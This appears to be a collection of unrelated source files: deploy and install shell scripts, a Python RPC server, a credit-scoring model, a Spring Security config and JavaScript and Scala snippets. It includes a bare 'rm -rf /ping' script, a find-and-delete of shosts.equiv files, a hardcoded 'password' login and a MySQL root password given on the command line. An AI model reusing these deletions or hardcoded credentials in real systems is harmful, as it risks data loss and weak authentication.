SKILL_NAME=$1
DO_DEBUG=${2:-false}
TARGET=${3:-"all"}
SKILL_ENV_NAME="skill_env"
if ! $DO_DEBUG ; then
exec > /dev/null 2>&1
fi
echo "###########################"
echo "##### pre-deploy hook #####"
echo "###########################"
if [[ $TARGET == "all" || $TARGET == "lambda" ]]; then
grep "sourceDir" ./skill.json | cut -d: -f2 | sed 's/"//g' | sed 's/,//g' | while read -r SOURCE_DIR; do
# Step 1: Decide source path and upload path
if [[ $SOURCE_DIR == */lambda_upload ]]; then
ADJUSTED_SOURCE_DIR=${SOURCE_DIR%"/lambda_upload"}
UPLOAD_DIR=$SOURCE_DIR
else
ADJUSTED_SOURCE_DIR=$SOURCE_DIR
UPLOAD_DIR="$SOURCE_DIR/lambda_upload"
fi
# Step 2: Create empty lambda_upload folder
echo "Checking for lambda_upload folder existence in sourceDir $ADJUSTED_SOURCE_DIR"
rm -rf $UPLOAD_DIR
mkdir $UPLOAD_DIR
# Step 3: Copy source code in sourceDir to lambda_upload
echo "Copying source code in $SKILL_NAME/$ADJUSTED_SOURCE_DIR folder to $SKILL_NAME/$UPLOAD_DIR"
rsync -avzq --exclude '*lambda_upload' $ADJUSTED_SOURCE_DIR/* $UPLOAD_DIR
# Step 4: Find virtual environment site packages, copy contents to lambda_upload
echo "Copying dependencies installed in $SKILL_NAME/.venv/$SKILL_ENV_NAME to $SKILL_NAME/$UPLOAD_DIR"
SITE=$(.venv/$SKILL_ENV_NAME/bin/python -c 'from distutils.sysconfig import get_python_lib; print(get_python_lib())')
cp -r $SITE/* $UPLOAD_DIR
# Step 4: Update the "manifest.apis.custom.endpoint.sourceDir" value in skill.json if necessary
if ! [[ $SOURCE_DIR == */lambda_upload ]]; then
echo "Updating sourceDir to point to lambda_upload folder in skill.json"
RAW_SOURCE_DIR_LINE="\"sourceDir\": \"$SOURCE_DIR\""
NEW_SOURCE_DIR_LINE="\"sourceDir\": \"$UPLOAD_DIR\""
sed -in "s#$RAW_SOURCE_DIR_LINE#$NEW_SOURCE_DIR_LINE#g" ./skill.json
fi
done
echo "###########################"
fi
exit 0
|
<gh_stars>0
from myhdl import *
from tope import *
from bram import *
from ClkDriver import *
from ResetDriver import *
import random
@block
def tbTope():
A_WIDTH = int(input("lineas del simulacion.hex/ Cantidad de bits del addr de la RAM: "))
clk = Signal(False)
DataInRAM = Signal(modbv(0)[32:])
reset = ResetSignal(0, active = 1, async=True)
Address = Signal(modbv(0)[A_WIDTH:])
WR = Signal(modbv(0)[4:])
WE = Signal(False)
RE = Signal(False)
DataOutRAM = Signal(modbv(0)[32:])
Done = Signal(False)
clkinst = ClkDriver(clk)
#resetinst = ResetDriver(reset)
braminst = BRAM(clk,Address,DataInRAM,WR,WE,RE,DataOutRAM,Done,A_WIDTH) #hex
topeinst = tope(clk,reset,DataOutRAM,Done,Address,DataInRAM,WR,WE,RE)
interv = delay(7)
return instances()
test = tbTope()
test.config_sim(trace=True)
test.run_sim(1000)
|
#! /usr/bin/env bash
apt-get -y install emacs24 emacs24-el emacs24-common-non-dfsg
|
#!/bin/sh
set -e
password=$1
# install SCSservo pyserial imutils
apt update
python3 setup.py install
cp -r JETANK_1_servos //workspace/jetbot/notebooks
cp -r JETANK_2_ctrl //workspace/jetbot/notebooks
cp -r JETANK_3_motionDetect //workspace/jetbot/notebooks
cp -r JETANK_4_colorRecognition //workspace/jetbot/notebooks
cp -r JETANK_5_colorTracking //workspace/jetbot/notebooks
cp -r JETANK_6_gamepadCtrl //workspace/jetbot/notebooks |
def sum_parameters(param1, param2):
return str(param1 + param2) |
from pathlib import Path
import feast
import joblib
import pandas as pd
from sklearn import tree
from sklearn.exceptions import NotFittedError
from sklearn.preprocessing import OrdinalEncoder
from sklearn.utils.validation import check_is_fitted
class CreditScoringModel:
categorical_features = [
"person_home_ownership",
"loan_intent",
"city",
"state",
"location_type",
]
feast_features = [
"zipcode_features:city",
"zipcode_features:state",
"zipcode_features:location_type",
"zipcode_features:tax_returns_filed",
"zipcode_features:population",
"zipcode_features:total_wages",
"credit_history:credit_card_due",
"credit_history:mortgage_due",
"credit_history:student_loan_due",
"credit_history:vehicle_loan_due",
"credit_history:hard_pulls",
"credit_history:missed_payments_2y",
"credit_history:missed_payments_1y",
"credit_history:missed_payments_6m",
"credit_history:bankruptcies",
]
target = "loan_status"
model_filename = "model.bin"
encoder_filename = "encoder.bin"
def __init__(self):
# Load model
if Path(self.model_filename).exists():
self.classifier = joblib.load(self.model_filename)
else:
self.classifier = tree.DecisionTreeClassifier()
# Load ordinal encoder
if Path(self.encoder_filename).exists():
self.encoder = joblib.load(self.encoder_filename)
else:
self.encoder = OrdinalEncoder()
# Set up feature store
self.fs = feast.FeatureStore(repo_path="feature_repo")
def train(self, loans):
train_X, train_Y = self._get_training_features(loans)
self.classifier.fit(train_X[sorted(train_X)], train_Y)
joblib.dump(self.classifier, self.model_filename)
def _get_training_features(self, loans):
training_df = self.fs.get_historical_features(
entity_df=loans, features=self.feast_features
).to_df()
self._fit_ordinal_encoder(training_df)
self._apply_ordinal_encoding(training_df)
train_X = training_df[
training_df.columns.drop(self.target)
.drop("event_timestamp")
.drop("created_timestamp")
.drop("loan_id")
.drop("zipcode")
.drop("dob_ssn")
]
train_X = train_X.reindex(sorted(train_X.columns), axis=1)
train_Y = training_df.loc[:, self.target]
return train_X, train_Y
def _fit_ordinal_encoder(self, requests):
self.encoder.fit(requests[self.categorical_features])
joblib.dump(self.encoder, self.encoder_filename)
def _apply_ordinal_encoding(self, requests):
requests[self.categorical_features] = self.encoder.transform(
requests[self.categorical_features]
)
def predict(self, request):
# Get online features from Feast
feature_vector = self._get_online_features_from_feast(request)
# Join features to request features
features = request.copy()
features.update(feature_vector)
features_df = pd.DataFrame.from_dict(features)
# Apply ordinal encoding to categorical features
self._apply_ordinal_encoding(features_df)
# Sort columns
features_df = features_df.reindex(sorted(features_df.columns), axis=1)
# Drop unnecessary columns
features_df = features_df[features_df.columns.drop("zipcode").drop("dob_ssn")]
# Make prediction
features_df["prediction"] = self.classifier.predict(features_df)
# return result of credit scoring
return features_df["prediction"].iloc[0]
def _get_online_features_from_feast(self, request):
zipcode = request["zipcode"][0]
dob_ssn = request["dob_ssn"][0]
return self.fs.get_online_features(
entity_rows=[{"zipcode": zipcode, "dob_ssn": dob_ssn}],
features=self.feast_features,
).to_dict()
def is_model_trained(self):
try:
check_is_fitted(self.classifier, "tree_")
except NotFittedError:
return False
return True
|
package com.demo.config;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.web.HttpSecurityBuilder;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.provisioning.InMemoryUserDetailsManager;
import org.springframework.security.web.authentication.www.BasicAuthenticationFilter;
import org.springframework.security.web.authentication.www.DigestAuthenticationFilter;
/**
* @author ankidaemon
*
*/
@Configuration
@EnableWebSecurity
@ComponentScan(basePackages = "com.demo.config")
public class SecurityConfig extends WebSecurityConfigurerAdapter {
/* @Autowired
public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
auth.inMemoryAuthentication().withUser("ankidaemon").password("password").roles("USER").and().withUser("test")
.password("<PASSWORD>").roles("USER");
}*/
@Bean
public UserDetailsService userDetailsService() {
InMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();
manager.createUser(User.withUsername("ankidaemon").password("password").roles("USER").build());
manager.createUser(User.withUsername("test").password("<PASSWORD>").roles("USER").build());
return manager;
}
@Autowired
private CustomBasicAuthenticationEntryPoint customBasicAuthenticationEntryPoint;
@Autowired
private CustomDigestAuthenticationEntryPoint customDigestAuthenticationEntryPoint;
@Override
protected void configure(HttpSecurity http) throws Exception {
http.authorizeRequests().regexMatchers("/chief/.*").hasRole("USER")
.regexMatchers("/agent/.*").access("hasRole('AGENT') and principal.name='<NAME>'").anyRequest()
.authenticated()
//.and().httpBasic().authenticationEntryPoint(customBasicAuthenticationEntryPoint)
.and().exceptionHandling().authenticationEntryPoint(customDigestAuthenticationEntryPoint)
.and().requiresChannel().anyRequest().requiresSecure()
//.and().addFilter(basicAuthenticationFilter(super.authenticationManagerBean()));
.and().addFilter(digestAuthenticationFilter());
http.formLogin().loginPage("/login").permitAll();
}
public DigestAuthenticationFilter digestAuthenticationFilter() {
DigestAuthenticationFilter digestAuthenticationFilter = new DigestAuthenticationFilter();
digestAuthenticationFilter.setAuthenticationEntryPoint(customDigestAuthenticationEntryPoint);
digestAuthenticationFilter.setUserDetailsService(userDetailsService());
return digestAuthenticationFilter;
}
public BasicAuthenticationFilter basicAuthenticationFilter(AuthenticationManager authManager) throws Exception {
BasicAuthenticationFilter basicAuthenticationFilter = new BasicAuthenticationFilter(authManager,
customBasicAuthenticationEntryPoint);
return basicAuthenticationFilter;
}
}
|
9.2
|
# Identify local mounts
MOUNT_LIST=$(df --local | awk '{ print $6 }')
# Find file on each listed mount point
for cur_mount in ${MOUNT_LIST}
do
find ${cur_mount} -xdev -type f -name "shosts.equiv" -exec rm -f {} \;
done
|
/*
* Toggle display of loaders / disable buttons
* -------------------------------------------
*
* @param loaders [array] of [HTMLElement]
* @param buttons [array] of [HTMLElement]
* @param show [boolean]
*/
export const setLoaders = ( loaders = [], buttons = [], show = true ) => {
if( loaders.length ) {
loaders.forEach( l => {
if( show ) {
l.removeAttribute( 'data-hide' );
} else {
l.setAttribute( 'data-hide', '' );
}
} );
}
if( buttons.length ) {
buttons.forEach( b => {
b.disabled = show;
b.setAttribute( 'aria-disabled', show.toString() );
} );
}
};
|
<reponame>orlouge/amphitrite-casket
package io.github.orlouge.amphitritecoffer.mixin;
import io.github.orlouge.amphitritecoffer.config.AmphitriteCofferConfig;
import net.minecraft.block.BlockState;
import net.minecraft.block.Blocks;
import net.minecraft.block.entity.LootableContainerBlockEntity;
import net.minecraft.structure.OceanMonumentGenerator;
import net.minecraft.structure.StructurePiece;
import net.minecraft.structure.StructurePieceType;
import net.minecraft.util.Identifier;
import net.minecraft.util.math.BlockBox;
import net.minecraft.util.math.BlockPos;
import net.minecraft.world.StructureWorldAccess;
import net.minecraft.world.gen.StructureAccessor;
import net.minecraft.world.gen.chunk.ChunkGenerator;
import org.spongepowered.asm.mixin.Mixin;
import org.spongepowered.asm.mixin.injection.At;
import org.spongepowered.asm.mixin.injection.Redirect;
import java.util.Random;
import static net.minecraft.state.property.Properties.WATERLOGGED;
import io.github.orlouge.amphitritecoffer.AmphitriteCofferMod;
@Mixin(OceanMonumentGenerator.CoreRoom.class)
public abstract class CoreRoomMixin extends StructurePiece {
private static final BlockState WATERLOGGED_COFFER = AmphitriteCofferMod.AMPHITRITE_COFFER_BLOCK.getDefaultState().with(WATERLOGGED, true);
protected CoreRoomMixin(StructurePieceType type, int length, BlockBox boundingBox) {
super(type, length, boundingBox);
}
@Redirect(method = "generate(Lnet/minecraft/world/StructureWorldAccess;Lnet/minecraft/world/gen/StructureAccessor;Lnet/minecraft/world/gen/chunk/ChunkGenerator;Ljava/util/Random;Lnet/minecraft/util/math/BlockBox;Lnet/minecraft/util/math/ChunkPos;Lnet/minecraft/util/math/BlockPos;)V",
at = @At(value = "INVOKE", target = "Lnet/minecraft/structure/OceanMonumentGenerator$CoreRoom;fillWithOutline(Lnet/minecraft/world/StructureWorldAccess;Lnet/minecraft/util/math/BlockBox;IIIIIILnet/minecraft/block/BlockState;Lnet/minecraft/block/BlockState;Z)V", ordinal = 12)
)
public void fillCoreRoomTreasure(OceanMonumentGenerator.CoreRoom coreRoom, StructureWorldAccess world, BlockBox box, int minX, int minY, int minZ, int maxX, int maxY, int maxZ, BlockState out, BlockState in, boolean canReplaceAir, StructureWorldAccess world2, StructureAccessor structureAccessor, ChunkGenerator chunkGenerator, Random random) {
if (AmphitriteCofferMod.CONFIG.disableMonumentGeneration) {
this.fillWithOutline(world, box, minX, minY, minZ, maxX, maxY, maxZ, out, in, canReplaceAir);
return;
}
this.fillWithOutline(world, box, minX, minY, minZ, maxX, maxY - 1, maxZ, out, in, canReplaceAir);
this.fillWithOutline(world, box, minX, minY + 1, minZ, maxX, maxY, maxZ, WATERLOGGED_COFFER, WATERLOGGED_COFFER, canReplaceAir);
int treasurePosition = random.nextInt(4), treasurePosition2 = (treasurePosition + random.nextInt(3) + 1) % 4;
int lootRotation = 0;
for (int x = minX; x < minX + 2; x++) {
for (int z = minZ; z < minZ + 2; z++) {
lootRotation++;
Identifier lootTable;
if (treasurePosition == lootRotation) {
lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_HEART;
} else if (treasurePosition2 == lootRotation) {
lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_TREASURE;
} else {
lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_GENERIC;
}
LootableContainerBlockEntity.setLootTable(
world,
random,
new BlockPos(this.applyXTransform(x, z), this.applyYTransform(minY + 1), this.applyZTransform(x, z)),
lootTable
);
}
}
}
}
|
const OFF = 0, WARN = 1, ERROR = 2;
module.exports = exports = {
"env": {
"browser" : true,
"node" : true,
"es6": true,
"jquery": true
},
"ecmaFeatures": {
"modules": true
},
"extends": ["eslint:recommended", "google"],
"rules": {
"no-console": WARN,
"no-undef": WARN,
"no-unused-vars": WARN,
"object-curly-spacing": OFF,
"no-multiple-empty-lines": OFF,
"arrow-parens": OFF,
"require-jsdoc": OFF,
"brace-style": OFF,
"padded-blocks": OFF,
"max-len": WARN,
},
"parserOptions": {
"ecmaVersion": 8,
"sourceType": "module"
}
};
|
#!/usr/bin/env bash
# bind conda to spark
echo -e "\nexport PYSPARK_PYTHON=/home/hadoop/conda/bin/python" >> /etc/spark/conf/spark-env.sh
echo "export PYSPARK_DRIVER_PYTHON=/home/hadoop/conda/bin/jupyter" >> /etc/spark/conf/spark-env.sh
echo "export PYSPARK_DRIVER_PYTHON_OPTS='notebook --no-browser --ip=$1'" >> /etc/spark/conf/spark-env.sh
|
<reponame>AliFrank608-TMW/RacingReact<filename>src/reducers/horse/index.js
import horseReducer from './horseReducer'
import { combineReducers } from 'redux'
const combinedHorseReducers = combineReducers({
horseInfo: horseReducer,
})
export default combinedHorseReducers
|
#!/bin/sh
if command -v lsd > /dev/null; then
alias ls='lsd -F --icon=never --date=relative'
alias l='ls -l'
alias lr='l --tree'
alias ll='l -a'
alias llr='ll --tree'
else
alias ls='ls -Fh --color=auto'
alias l='ls -l'
alias lr='tree'
alias ll='l -A'
alias llr='tree -a'
fi
alias bat='bat --tabs=4'
alias -- -='cd -'
alias rm='rm -I'
alias cp='cp -i'
alias mv='mv -i'
alias mkdir='mkdir -p'
alias grep='grep --color'
alias greppy='grep -C 3'
alias du='du -h'
alias df="df -kTh"
alias re='grep -E'
alias less='bat'
alias ccat='kitty +kitten icat'
alias scb="xclip -selection c"
alias gcb="xclip -selection c -o"
alias edit='micro'
alias c='clear'
alias b='bat'
alias e='edit'
alias v='nvim'
alias iomon='sudo iotop'
alias sysm='bpytop'
alias ctl='systemctl'
alias uctl='systemctl --user'
alias docker-start='sudo systemctl start docker.service'
alias docker-stop='sudo systemctl stop docker.service'
alias docker='sudo docker'
alias docker-compose='sudo docker-compose'
|
#!/bin/bash
relation=$1
python2 sl_policy.py $relation
python2 policy_agent.py $relation retrain
python2 policy_agent.py $relation test
|
'use strict';
const {Tray, Menu} = require('electron');
const path = require('path');
/**
* 托盘模块
*/
module.exports = {
/**
* 安装
*/
install (eeApp) {
eeApp.logger.info('[preload] load tray module');
const trayConfig = eeApp.config.tray;
const mainWindow = eeApp.electron.mainWindow;
// 托盘图标
let iconPath = path.join(eeApp.config.homeDir, trayConfig.icon);
// 托盘菜单功能列表
let trayMenuTemplate = [
{
label: '显示',
click: function () {
mainWindow.show();
}
},
{
label: '退出',
click: function () {
eeApp.appQuit();
}
}
]
// 点击关闭,最小化到托盘
mainWindow.on('close', (event) => {
mainWindow.hide();
mainWindow.setSkipTaskbar(true);
event.preventDefault();
});
mainWindow.show();
// 测试发现:创建的Tray对象实例变量和app.whenReady()在同一模块中定义才行
// 赋值给eeApp.electron.tray,已在框架ee-core包中定义
// 如果赋值给其它变量,可能出现异常,估计是electron的bug
eeApp.electron.tray = new Tray(iconPath);
let appTray = eeApp.electron.tray;
appTray.setToolTip(trayConfig.title); // 托盘标题
const contextMenu = Menu.buildFromTemplate(trayMenuTemplate);
appTray.setContextMenu(contextMenu);
// 监听 显示/隐藏
appTray.on('click', function(){
if (mainWindow.isVisible()) {
mainWindow.hide();
mainWindow.setSkipTaskbar(false);
} else {
mainWindow.show();
mainWindow.setSkipTaskbar(true);
}
});
}
}
|
var path = require('path');
var express = require('express');
var app = express();
app.use(express.static(__dirname));
app.use('/angular-offline.js', express.static(path.join(__dirname, '../angular-offline.js')));
app.use('/angular-offline.min.js', express.static(path.join(__dirname, '../angular-offline.min.js')));
app.use('/angular-offline.min.js.map', express.static(path.join(__dirname, '../angular-offline.min.js.map')));
app.use('/bower_components', express.static(path.join(__dirname, '../bower_components')));
app.get('/test.json', function (req, res) {
res.send({foo: 'bar'});
});
app.post('/test.json', function (req, res) {
res.send({foo: 'bar'});
});
app.listen(process.env.PORT || 3000);
console.log('Server is listening, http://localhost:3000/');
|
import requests
import logging
logger = logging.getLogger(__name__)
class MonzoClientError(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class MonzoClient:
def __init__(self, access_token):
self.access_token = access_token
def get_account_balance(self):
try:
response = requests.get('https://api.monzo.com/balance', headers={'Authorization': f'Bearer {self.access_token}'})
response.raise_for_status() # Raise an error for non-2xx status codes
return response.json()['balance']
except requests.RequestException as e:
logger.error(f"Failed to retrieve account balance: {e}")
raise MonzoClientError("Failed to retrieve account balance")
def get_transaction_history(self, since=None):
try:
params = {'since': since} if since else {}
response = requests.get('https://api.monzo.com/transactions', headers={'Authorization': f'Bearer {self.access_token}'}, params=params)
response.raise_for_status() # Raise an error for non-2xx status codes
return response.json()['transactions']
except requests.RequestException as e:
logger.error(f"Failed to retrieve transaction history: {e}")
raise MonzoClientError("Failed to retrieve transaction history") |
<filename>node_modules/@angular-eslint/eslint-plugin-template/dist/processors.d.ts
/**
* Because ultimately a user is in control of how and when this processor gets invoked,
* we can't fully protect them against doing more work than is necessary in all cases.
*
* Therefore, before we do a full parse of a TypeScript file to try and extract one or
* more Component declarations we want to do a really quick check for whether or not
* a file is likely to contain them.
*/
export declare function isFileLikelyToContainComponentDeclarations(text: string, filename: string): boolean;
declare type PreprocessResult = (string | {
text: string;
filename: string;
})[];
export declare function preprocessComponentFile(text: string, filename: string): PreprocessResult;
export declare function postprocessComponentFile(multiDimensionalMessages: {
ruleId: string;
severity: number;
message: string;
line: number;
column: number;
nodeType: string;
messageId: string;
endLine: number;
endColumn: number;
fix?: {
range: number[];
text: string;
};
}[][], _filename: string): readonly unknown[];
declare const _default: {
'extract-inline-html': {
preprocess: typeof preprocessComponentFile;
postprocess: typeof postprocessComponentFile;
supportsAutofix: boolean;
};
};
export default _default;
|
<reponame>vchoudhari45/codingcargo<gh_stars>1-10
package com.vc.easy
object L541 {
def reverseStr(s: String, k: Int): String = {
val arr = s.toCharArray
val n = arr.length
var start = 0
var end = 0
def reverse(from:Int, to:Int): Unit = {
var fromVar = from
var toVar = to
while(fromVar < toVar) {
val tmp = arr(fromVar)
arr(fromVar) = arr(toVar)
arr(toVar) = tmp
fromVar += 1
toVar -= 1
}
}
while(start < n) {
end = Math.min(start + k - 1, n -1)
reverse(start, end)
start += 2 * k
}
arr.mkString("")
}
}
|
<filename>giveMeHandFrond-end/src/app/chart/chart.component.ts
import { Component, OnInit } from '@angular/core';
import { ChartDataSets, ChartOptions, ChartType } from 'chart.js';
import { Color, Label, MultiDataSet } from 'ng2-charts';
import { DemandeService } from '../services/demande-service';
import { OffreServiceService } from '../services/offre-service.service';
@Component({
selector: 'app-chart',
templateUrl: './chart.component.html',
styleUrls: ['./chart.component.scss']
})
export class ChartComponent implements OnInit {
barChartLabels: Label[] = [];
barChartType: ChartType = 'bar';
barChartLegend = true;
barChartPlugins = [];
offres: any;
categories: any;
villes: any;
barChartData: ChartDataSets[];
barChartDataDemandes: ChartDataSets[];
colors = [{borderColor: 'black',backgroundColor: [
"#E7930F",
"#FFFCFC",
"#D4B584 "
]}];
doughnutChartLabels: Label[] = ['En attente', 'Acceptée', 'Refusée'];
doughnutChartData: MultiDataSet = [];
doughnutChartType: ChartType = 'doughnut';
constructor(private offreService: OffreServiceService,private demandeService: DemandeService){
}
lbarChartOptions: ChartOptions = {
responsive: true,
};
ngOnInit(): void {
this.refreshData();
}
refreshData() {
var data = [];
var data2 = [];
this.offres = this.offreService.getOffreList();
this.categories = this.offreService.getCategories();
this.categories.subscribe((value) => {
if(value.length == 0) {
console.log("aucune catégorie");
}
else{
var i = 1;
console.log(value.length);
value.forEach(element =>{
if(i<value.length){
this.barChartLabels.push(value[i]);
data.push(0);
data2.push(0);
}
i++;
});
}
});
var nbCat = this.barChartLabels.length;
this.offres.subscribe((value) => {
if(value.length == 0) {
console.log("aucune offre");
}
else{
value.forEach(element => {
var cat = element.categorie;
var j = this.barChartLabels.indexOf(cat);
data[j] =data[j]+1;
});
}});
this.barChartData = [{ data: data, label: 'Offres/Catégories',backgroundColor:'rgba(229, 152, 102)' }];
var nbOffres= [0,0,0];
var demandes = this.demandeService.getAllDemandes();
demandes.subscribe((value) =>{
if(value.length == 0) {
console.log("aucune demande");
//this.barChartDataDemandes = [{ data: data2, label: 'Demandes/Catégorie',backgroundColor:'rgba(243, 156, 18 )' }];
}
else{
value.forEach(element => {
var status = element.statut;
var cat = element.offre.categorie;
var j = this.barChartLabels.indexOf(cat);
data2[j] =data2[j]+1;
if(status=="ATTENTE"){
nbOffres[0] = nbOffres[0]+1;
}
else if(status == "ACCEPTE"){
nbOffres[1] = nbOffres[1]+1;
}
else{
nbOffres[2] = nbOffres[2]+1;
}
});
}
console.log(data2);
this.barChartDataDemandes = [{ data: data2, label: 'Demandes/Catégorie',backgroundColor:'rgba(243, 156, 18 )' }];
this.doughnutChartData= [nbOffres];
});
}
}
|
#!/bin/sh
rm -rf /ping
|
# encoding:utf-8
import os
import sys
import math
import json
import errno
import struct
import signal
import socket
import asyncore
from cStringIO import StringIO
from kazoo.client import KazooClient
import Request_pb2
class RPCServer(asyncore.dispatcher):
zk_root = "/demo"
zk_rpc = zk_root + "/rpc"
zk_rpc1 = zk_root + "/rpc1"
def __init__(self,host,port):
asyncore.dispatcher.__init__(self)
self.host = host
self.port = port
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host,port))
self.listen(1)
self.child_pids = []
if self.prefork(3):
self.register_zk() # 注册服务
self.register_parent_signal() # 父进程善后处理
else:
self.register_child_signal() # 子进程善后处理
for pid in self.child_pids:
print pid
# 开启n个子进程
def prefork(self,n):
for i in range(n):
pid = os.fork()
if pid < 0:
raise
if pid > 0: # 父进程
self.child_pids.append(pid) # 记录子进程的pid
continue
if pid == 0: # 子进程
return False
return True
def register_zk(self):
print "start register zk..."
self.zk = KazooClient(hosts = "172.16.17.32:3181")
self.zk.start()
self.zk.ensure_path(self.zk_root)
value = json.dumps({"host":self.host,"port":self.port})
# 创建服务子节点
self.zk.create(self.zk_rpc,value,ephemeral=True, sequence=True)
value_1 = json.dumps({"host":"172.16.17.32","port":8082})
# 创建第二个服务子节点
# self.zk.create(self.zk_rpc1,value_1,ephemeral=True, sequence=True)
print "zk localhost 3181"
def exit_parent(self,sig,frame):
print "exit_parent"
def reap_child(self,sig,frame):
print "before reap_child"
while True:
try:
info = os.waitpid(-1,os.WNOHANG)
break
except OSError,ex:
if ex.args[0] == errno.ECHILD:
return # 无子进程收割
if ex.args[0] != errno.EINTR:
raise ex
pid = info[0]
try:
self.child_pids.remove(pid)
except ValueError:
pass
print "reap_child pid:",pid
def exit_child(self,sig,frame):
self.close() # 关闭serversocket
asyncore.close_all() # 关闭所有clientsocket
print "exit_child all_closed"
def register_parent_signal(self):
signal.signal(signal.SIGINT,self.exit_parent)
signal.signal(signal.SIGTERM,self.exit_parent)
signal.signal(signal.SIGCHLD,self.reap_child) # -9 -2
def register_child_signal(self):
signal.signal(signal.SIGINT, self.exit_child)
signal.signal(signal.SIGTERM, self.exit_child)
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock,addr = pair
print sock,pair
print "handle_accept"
RPCHandler(sock,addr)
class RPCHandler(asyncore.dispatcher_with_send):
def __init__(self,sock,addr):
asyncore.dispatcher_with_send.__init__(self,sock=sock)
self.addr = addr
self.handlers = {"ping":self.ping,"pi":self.pi}
self.rbuf = StringIO()
print "RPCHandler __init__"
def ping(self,params):
print "服务端 RPCHandler() ping"
self.send_result("RPCHandler()pong",params)
def pi(self,n):
print "客户端 RPCHandler() pi"
s = 0.0
for i in range(int(n)+1):
s += math.pow(-1,i)/(2*i+1)
p = 4*s
self.send_result("pi_server_return:",p)
def send_result(self,out,result):
# response = {"out":out,"result":result}
response = Request_pb2.Request()
response._in = out
response.params = str(result)
# body = json.dumps(response)
body = response.SerializeToString()
length_prefix = struct.pack("I",len(body))
self.send(length_prefix)
self.send(body)
def handle_connect(self):
print self.addr,'handle_connect() client comes...'
def handle_close(self):
print self.addr,'handle_close() bye...'
def handle_read(self):
while True:
content = self.recv(1024)
print "handle_read() content...",content
if content:
self.rbuf.write(content)
if len(content)<1024:
print "读取完毕"
break
self.handle_rpc()
def handle_rpc(self):
while True:
self.rbuf.seek(0)
length_prefix = self.rbuf.read(4)
if len(length_prefix) < 4:
break
length,=struct.unpack("I",length_prefix)
body = self.rbuf.read(length)
if len(body) < length:
break
# request = json.loads(body)
request = Request_pb2.Request()
request.ParseFromString(body)
# in_ = request['in']
# params = request['params']
in_ = request._in
params = request.params
print os.getpid(), in_, params
handler = self.handlers[in_]
handler(str(params))
left = self.rbuf.getvalue()[length + 4:]
print left
self.rbuf = StringIO()
self.rbuf.write(left)
self.rbuf.seek(0, 2)
if __name__ == "__main__":
host = sys.argv[1]
port = int(sys.argv[2])
print host,port
RPCServer(host,port)
asyncore.loop()
|
#!/bin/bash
mysql -P 3306 -h 10.143.129.32 -u root -proot test < $DAVINCI_HOME/bin/davinci.sql
|
#!/bin/bash
TARGET=~/origem/
DESTINY=~/destino/
STRING="Substring to Search"
inotifywait -m -e create -e moved_to --format "%f" "${TARGET}$(date +%Y/%m/)" \
| while read FILENAME
do
if grep -q $STRING "${TARGET}$(date +%Y/%m/)${FILENAME}"; then
mv "${TARGET}$(date +%Y/%m/)${FILENAME}" "${DESTINY}$(date +%Y/%m/)${FILENAME}"
fi
done
|
<gh_stars>10-100
from distutils.core import setup
setup(
name='receipt_budget',
version='0.6',
packages=['receipts.receipts', 'receipts.receipts-app'],
url='https://github.com/rolisz/receipt_budget',
license='BSD',
author='Roland',
author_email='<EMAIL>',
description='An application for managing expenses and doing OCR on receipts',
requires=[
'django (>= 1.5)', 'scikitlearn', 'SimpleCV', 'django-tokenapi',
'django-userena', 'geopy'
]
)
|
CREATE TABLE [core].[Fields]
(
[Id] INT NOT NULL PRIMARY KEY identity(100000,1),
[TableName] varchar(64) not null,
[Name] varchar(64) not null,
[Title] varchar(64) not null,
[Type] int not null,
[IsHidden] bit not null default(0),
[IsDeleted] bit not null default(0),
[IsSystem] bit not null default(0),
[IsAutoGenerated] bit not null default(0),
[ShowInUi] bit not null default(1),
[UiIndex] int not null default(0),
[SqlDataType] varchar(64) not null,
--[InternalName] varchar(64) not null,
CONSTRAINT UniqueTableNameFieldName UNIQUE NONCLUSTERED ([TableName],[Name])
)
|
#!/usr/bin/env bash
#
# Copyright (c) 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der angewandten Forschung e.V.
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
